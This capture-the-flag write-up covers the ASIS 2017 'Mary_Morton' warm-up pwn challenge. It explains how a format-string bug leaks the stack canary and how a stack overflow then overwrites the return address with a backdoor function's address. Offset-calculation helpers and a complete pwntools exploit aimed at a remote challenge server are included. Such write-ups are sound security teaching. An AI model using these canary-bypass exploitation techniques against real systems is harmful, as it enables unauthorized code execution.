Mary_Morton

Source: ASIS-CTF-Finals-2017

Description: a very simple warm-up pwn


The binary is compiled with stack canary protection, so a plain overflow would be caught by the canary check. The program has two bugs: a format-string vulnerability, which we use to leak the canary off the stack with a positional `%N$p`, and a stack overflow, which we then use to overwrite the return address with the address of the backdoor function, keeping the leaked canary in place so the check still passes.
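The two numbers in the exploit (the `%23$p` argument index and the 136 bytes of padding) are not independent: both come from the distance between the start of the buffer and the canary. The helper below is an added example of my own, not code from the original writeup, and it assumes a frame layout consistent with those numbers: a 0x88-byte buffer at the top of the frame (so `%6$p`, the first stack argument on x86-64 SysV, is its first qword), the canary directly above it, then the saved rbp and the return address. The leak value it parses is a constructed sample, and it also checks the property every glibc canary has, a zero low byte, which is the quickest way to tell a wrong offset from a real leak.

```python
import re
import struct

# Assumed frame layout (consistent with the numbers used in the exploit):
# the 0x88-byte buffer starts at rsp, the canary sits right above it at rbp-8,
# followed by the saved rbp and the return address.
BUF_TO_CANARY = 0x88      # bytes from the start of the buffer to the canary
FIRST_STACK_ARG = 6       # on x86-64 SysV, %6$p is the first qword read from [rsp]


def p64(value: int) -> bytes:
    """Little-endian 8-byte pack (same as pwntools' p64)."""
    return struct.pack('<Q', value)


def canary_fmt_index(buf_to_canary: int = BUF_TO_CANARY,
                     first_stack_arg: int = FIRST_STACK_ARG) -> int:
    """Positional printf argument N such that '%N$p' prints the canary."""
    if buf_to_canary % 8:
        raise ValueError('canary is 8-byte aligned; distance must be a multiple of 8')
    return first_stack_arg + buf_to_canary // 8


def leak_fmt(index: int) -> bytes:
    """Format string that prints stack argument `index` as a pointer."""
    return b'%%%d$p' % index


def parse_canary(line: bytes) -> int:
    """Parse the '0x...' printed by %N$p and sanity-check that it looks like a canary."""
    m = re.fullmatch(rb'\s*(0x[0-9a-fA-F]{1,16})\s*', line)
    if not m:
        raise ValueError('leak is not a hex pointer: %r' % line)
    value = int(m.group(1), 16)
    # A glibc stack canary always has its lowest byte zeroed (so string
    # functions stop at it); a non-zero low byte means the offset is wrong
    # and we most likely leaked a pointer or data instead.
    if value == 0 or value & 0xff:
        raise ValueError('%#x does not look like a canary; check the %%N$p offset' % value)
    return value


def build_payload(canary: int, ret_addr: int, buf_to_canary: int = BUF_TO_CANARY) -> bytes:
    """Padding up to the canary, the leaked canary, a dummy saved rbp, then the new return address."""
    return b'a' * buf_to_canary + p64(canary) + p64(0) + p64(ret_addr)


if __name__ == '__main__':
    idx = canary_fmt_index()                     # 23 for this layout
    print(leak_fmt(idx))                         # b'%23$p'
    c = parse_canary(b'0x9f3a1c5e2b7d4600\n')    # constructed sample leak
    print(hex(c), len(build_payload(c, 0x4008DA)))
```

When debugging locally, compare `canary_fmt_index()` against the value you read at the canary slot in gdb; if `parse_canary` rejects the leak, walk the index up or down by one until the printed qword ends in `00`.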

The exploit is as follows:

from pwn import *

#io = process('./pwn')
#io = gdb.debug('./pwn', 'b *0x40093F')
io = remote('111.200.241.244', 50734)
backdoor_addr = 0x4008DA          # address of the challenge's backdoor function

# Step 1: menu option 2 has the format-string bug. %23$p prints the 23rd
# printf argument, which is the stack slot holding the canary.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'2')
sleep(1)
io.sendline(b'%23$p')
canary = int(io.recvline().strip(), 16)
# glibc canaries always end in 0x00; anything else means the offset is wrong.
assert canary & 0xff == 0, 'leaked value does not look like a canary'
info('canary: %#x' % canary)

# Step 2: menu option 1 has the stack overflow. 136 bytes of padding reach
# the canary; keep it intact, then a dummy saved rbp, then the return address.
io.recvuntil(b'3. Exit the battle \n')
io.sendline(b'1')
payload = b'a' * 136 + p64(canary) + p64(0) + p64(backdoor_addr)
sleep(1)
io.send(payload)

io.interactive()
